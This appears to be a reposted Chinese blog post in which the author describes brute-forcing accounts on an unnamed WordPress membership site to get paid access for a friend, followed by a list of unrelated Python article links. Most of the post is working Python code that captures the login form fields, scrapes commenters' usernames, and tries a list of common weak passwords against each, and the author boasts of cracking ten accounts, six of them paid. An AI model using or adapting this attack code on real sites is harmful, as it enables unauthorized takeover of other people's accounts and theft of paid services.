python会员折扣_Python骚操作 | 用python爆破某会员网站
早上照例闲逛,发现简书出了个很有意思的作者,ID叫做爷是奥巴马,发的文章也是不同凡响,上来就对别人家网站玩爆破。。。
————————————————————————————————
暑假在家上网,qq群里一位好友给我说他想要某个网站的会员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。
然后就有了思路(骚操作)
先讲一下思路
1 .先注册用户登录
2.flidder抓包
3.python 模拟登录
4.在评论区抓取评论的用户名
5.弱密码爆破
登录
登录页面如下
flidder抓包
抓包之后发现有以下几个字段
'log': 'admin', # 用户名
'pwd': 'admin', # 密码
'wp-submit': '登录',
'redirect_to': '',
'wpuf_login': 'true',
'action': 'login',
'_wpnonce': '4b4e82f670',
'_wp_http_referer': '/%e7%99%bb%e5%bd%95?loggedout=true'
只要用户名和密码不同,其他的不变
python 模拟登录
这部分就比较简单,用到requests模块
import re
import requests
def baopo(log):
url = 'http://XXXXXX.com/%e7%99%bb%e5%bd%95'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
'Referer': 'http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true' #网站打码
}
data = {
'log': log,
'pwd': 'admin',
'wp-submit': '登录',
'redirect_to': '',
'wpuf_login': 'true',
'action': 'login',
'_wpnonce': '4b4e82f670',
'_wp_http_referer': '/%e7%99%bb%e5%bd%95?loggedout=true'
}
a = requests.post(url, headers=headers, data=data)
if a.history == []:
return False
else:
return True
得到用户名
这部分主要用到正则模块匹配就行了
import re
import requests
def gethtml(url):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
'Referer': 'http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true'
}
html = requests.get(url, headers=headers)
return html.text
for i in range(30,36):
if i == 1:
url = 'http:/XXXXXX.com/'
else:
url = 'http://XXXXXXX.com/page/' + str(i)
html = gethtml(url)
for each in re.findall('
print(each)
if int(each[-4:].replace('/','').replace('s','')) < 100:
for each2 in re.findall('(.*?):', gethtml(each)):
if 'href' in each2:
each2 = re.findall("class='url'>(.*?)
", each2)[0]
f = open('yonghu.txt','a+',encoding='utf-8')
f.write(each2)
f.write('\n')
f.close()
print(each2)
得到用户名保存在yonghu.txt文件里
开始爆破
本来想加上多线程,但因为网站太垃圾了,访问过快会限制,那就算了吧。。。
import requests
import multiprocessing
def baopo(log):
url = 'http://XXXXX.com/%e7%99%bb%e5%bd%95'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
'Referer': 'http://XXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true'
}
pwd =['000000','111111','11111111','112233','123123','123321','123456','12345678','654321','666666','888888','abcdef','abcabc',\
'abc123','a1b2c3','aaa111','123qwe','qwerty','qweasd','admin',\
'password','p@ssword','passwd','iloveyou','5201314','88888888','147258369','1234567890']
pwd.append(log)
for each in pwd:
print('using>>>'+each)
data = {
'log': log,
'pwd': each,
'wp-submit': '登录',
'redirect_to': '',
'wpuf_login': 'true',
'action': 'login',
'_wpnonce': '4b4e82f670',
'_wp_http_referer': '/%e7%99%bb%e5%bd%95?loggedout=true'
}
a = requests.post(url, headers=headers, data=data)
if a.history == []:
continue
else:
f = open('success.txt','a+',encoding='utf-8')
f.write('User:')
f.write(log)
f.write(' Passwd:')
f.write(each)
print('succeed!\n')
return True
f = open('yonghu.txt','r', encoding='utf-8')
yonghuming = set()
yonghuming.add('adminn')
for line in f.readlines():
line = line.strip()
yonghuming.add(line)
if __name__ == '__main__':
for each in yonghuming:
#p = multiprocessing.Process(target=baopo, args=(each,))
#p.start()
print(each)
baopo(each)
#print(yonghuming)
运行效果图
收获
放在服务器上跑了一晚,爆出来10个账号,其中6个充值了会员,美吱吱
————————————————————————————————
你想更深入了解学习Python知识体系,你可以看一下我们花费了一个多月整理了上百小时的几百个知识点体系内容:
python会员折扣_Python骚操作 | 用python爆破某会员网站相关推荐
- python程序怎么保存到u盘_Python 骚操作,自动拷贝U盘
阅读文本大概需要 6 分钟. Python 这门语言有非常多有趣的内容,比如给微信好友自动发消息.查看微信好友撤回的消息.通过微信控制电脑等等.在我公众号上也分享过很多有趣的程序,近期我会去搜集一些骚 ...
- python switch语句_几个Python里的骚操作
今天给大家分享几个Python里面的骚操作,大家会更加感受到Python编码的强大. 1.用字典映射代替switch case语句 大家首先看下面这段用C#编写的switch case代码,代码很好理 ...
- Python骚操作:Python控制Excel实现自动化办公!
Python骚操作:Python控制Excel实现自动化办公! 1.安装 Python骚操作:Python控制Excel实现自动化办公! 2.操作一个简单的Excel文档 操作注释及代码: Pytho ...
- c语言实现爬虫功能,用C/C 扩展Python语言_python 调用c语言 python实现简单爬虫功能_python实现简单爬虫...
用C/C 扩展Python语言 Python是一门功能强大的脚本语言,它的强大不仅表现在功能上,还表现在其扩展性上.她提供大量的API以方便程序员利用C/C++对Python进行扩展.因为执行速度慢几 ...
- pythonurllib微博登录怎么删_Python骚操作之删微博还需用手动吗?Python去做就好了!...
原标题:Python骚操作之删微博还需用手动吗?Python去做就好了! 导语 利用Python来自动删除微博说说! 最近被被「新浪微勃」恶心到了,事件详情请见 王思聪杀死微博 ,决定删除所有微博动态 ...
- python 将图片转换成像素画_Python 骚操作之图片转字符画
今天给大家介绍一个 Python 的骚操作,将图片转化为字符画,又是一个装逼的好技巧,大家赶紧 get 一下吧! 实现原理: 字符画是一系列字符的组合,我们可以把字符看作是比较大块的像素,一个字符能表 ...
- python提取pdf表格数据_Python骚操作,提取pdf文件中的表格数据!
在实际研究中,我们经常需要获取大量数据,而这些数据很大一部分以pdf表格的形式呈现,如公司年报.发行上市公告等.面对如此多的数据表格,采用手工复制黏贴的方式显然并不可取.那么如何才能高效提取出pdf文 ...
- 骚操作之Python微信远程控制摄像头!然后嘿嘿嘿!
盯着电脑工作大半天了,有点疲劳,想想同样苦逼盯着电脑的女朋友,就想逗逗她缓解一下疲劳. 于是一时手痒,开始了新一轮的骚操作,用Python基于itchat实现微信控制电脑打开摄像头拍摄当前电脑的使用者 ...
- python 文件管理_python 文件操作
一.python中文件管理 文件管理是很多应用程序的基本功能和重要组成部分.Python可以使文件管理极其简单,特别是和其它语言相对比. 1.介绍 几乎以任何语言编写的众多应用程序中,文件管理是很重要 ...
最新文章
- apache php linux 安全,Centos7环境下的apache和php安全设置及优化 | 彬菌
- 1.1.linux命令.概要学习
- iphone 软键盘
- 什么叫内部银团_什么是紫钛晶?紫钛晶是不是天然水晶?
- LeetCode 1128. 等价多米诺骨牌对的数量(哈希)
- 【Java】计算一组同学一门课程的平均成绩、最高成绩和最低成绩
- (原創) 這學期C++完美的Ending (C/C++) (日記)
- 学校题库管理系统需求分析
- Redhat8.0最小化安装没有tab补全命令
- Pubmedy的使用教程
- #超级818汽车狂欢夜#易车 买车不吃亏就上易车app
- 【ESP8266个人学习笔记】二、自动控制系统的输入输出信号
- Ajax详解第六篇(jQuery实现Ajax)
- 炫舞时代显示服务器出错,qq炫舞2各种常见bug大全 FAQ详解
- 基于java的格式转换,word 转 pdf、word 转图片、office 格式转换、在线文件预览
- 李建忠设计模式之”数据结构“模式
- Photoshop-颜色的调整
- SPRING IN ACTION 第4版笔记-第四章Aspect-oriented Spring-001-什么是AOP
- ui设计移动端字体适配_移动端字体ui设计 移动端界面设计规范
- 计算机专业985性价比,十所具性价比的985高校